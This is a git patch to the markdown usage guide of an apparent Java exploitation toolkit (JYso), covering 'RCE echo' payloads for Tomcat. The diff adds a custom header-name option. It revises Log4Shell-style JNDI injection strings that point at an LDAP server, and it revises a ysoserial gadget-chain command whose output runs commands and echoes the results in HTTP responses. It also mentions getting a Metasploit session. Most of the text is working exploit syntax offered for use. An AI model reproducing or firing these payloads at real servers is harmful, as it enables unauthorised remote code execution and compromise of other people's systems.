From 27b04b2d055428891548a4251f451326a454ea89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=82=81?= <75202638+qi4L@users.noreply.github.com> Date: Thu, 10 Oct 2024 17:55:06 +0800 Subject: [PATCH] =?UTF-8?q?Updated=204=E3=80=81JAVA=20RCE=20Echo=20(markdo?= =?UTF-8?q?wn)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 4、JAVA-RCE-Echo.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/4、JAVA-RCE-Echo.md b/4、JAVA-RCE-Echo.md index fa305f2..33bdc9d 100644 --- a/4、JAVA-RCE-Echo.md +++ b/4、JAVA-RCE-Echo.md @@ -28,6 +28,8 @@ 使用时在 Header 中加入 `X-Token-Data` 也可以自行指定,其值为待执行的命令,命令执行结果将回显在 response 中。 +通过参数`-ch cmd`来自定义 + + JNDI-Injection-Exploit 用法: + 不需要参数时 ``` @@ -36,12 +38,12 @@ ${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho} + 需要参数时 ``` -${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/LWNoIENvb2tpZXNz} +${jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/[base64_encoding:-ch cmd]} ``` + ysoserial ``` -java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" +java -jar JYso-[version].jar -y -g [Gadget] -p "EX-TomcatEcho" -ch "cmd" ``` - 支持tomcatBypass路由直接上线msf: